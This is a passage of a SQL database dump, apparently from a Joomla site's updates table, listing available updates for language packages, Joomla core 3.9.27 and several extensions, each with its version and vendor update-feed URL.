Bokmal','','pkg_nb-NO','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(28910,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(28911,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(28912,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(28913,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(28914,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(28915,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(28916,57,0,'English US','','pkg_en-US','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(28917,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(28918,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(28919,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(28920,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(28921,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(28922,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(28923,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(28924,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(28925,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(28926,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(28927,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(28928,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(28929,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(28930,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(28931,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(28932,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.27.2','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(28933,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(28934,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(28935,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(28936,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(28937,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(28938,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(28939,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(28940,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(28941,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(28942,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(28943,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.7','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-7			\n		',''),(28944,129,0,'JCE 2.9.8','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.8','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-8-released',''),(28946,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28947,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28948,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28949,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28950,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28951,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28952,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28953,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28954,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28955,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28956,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28957,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28958,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28959,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28960,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28961,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28962,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28963,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28964,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28965,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28966,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28967,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28968,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(28969,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28970,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(28971,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(28972,3,0,'French','','pkg_fr-FR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(28973,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(28974,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(28975,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(28976,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(28977,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(28978,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(28979,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(28980,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(28981,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(28982,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(28983,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(28984,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(28985,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(28986,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(28987,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(28988,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(28989,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(28990,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(28991,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(28992,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(28993,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(28994,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(28995,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(28996,3,0,'English US','','pkg_en-US','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(28997,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(28998,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(28999,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29000,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29001,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29002,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29003,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29004,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29005,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29006,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29007,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29008,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29009,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29010,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29011,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29012,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.27.2','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29013,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29014,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(29015,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(29016,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29017,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29018,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29019,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29020,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29021,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29022,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29023,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29024,57,0,'French','','pkg_fr-FR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29025,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29026,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29027,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29028,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29029,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29030,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29031,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29032,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29033,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29034,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29035,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29036,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29037,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29038,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29039,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29040,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29041,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29042,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29043,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29044,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29045,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29046,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29047,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29048,57,0,'English US','','pkg_en-US','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29049,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29050,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29051,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29052,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29053,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29054,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29055,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29056,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29057,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29058,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29059,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29060,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29061,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29062,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29063,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29064,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.27.2','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29065,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29066,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(29067,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(29068,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29069,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29070,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29071,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29072,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29073,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29074,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(29075,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.7','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-7			\n		',''),(29076,129,0,'JCE 2.9.8','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.8','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-8-released',''),(29077,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29078,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29079,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29080,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29081,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29082,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29083,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29084,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29085,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29086,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29087,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29088,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29089,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29090,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29091,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29092,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29093,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29094,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29095,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29096,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29097,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29098,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29099,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29100,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29101,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29102,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29103,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29104,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29105,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29106,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29107,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29108,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29109,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29110,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29111,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29112,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29113,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29114,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29115,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29116,3,0,'French','','pkg_fr-FR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29117,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29118,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29119,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29120,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29121,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29122,3,0,'Arabic 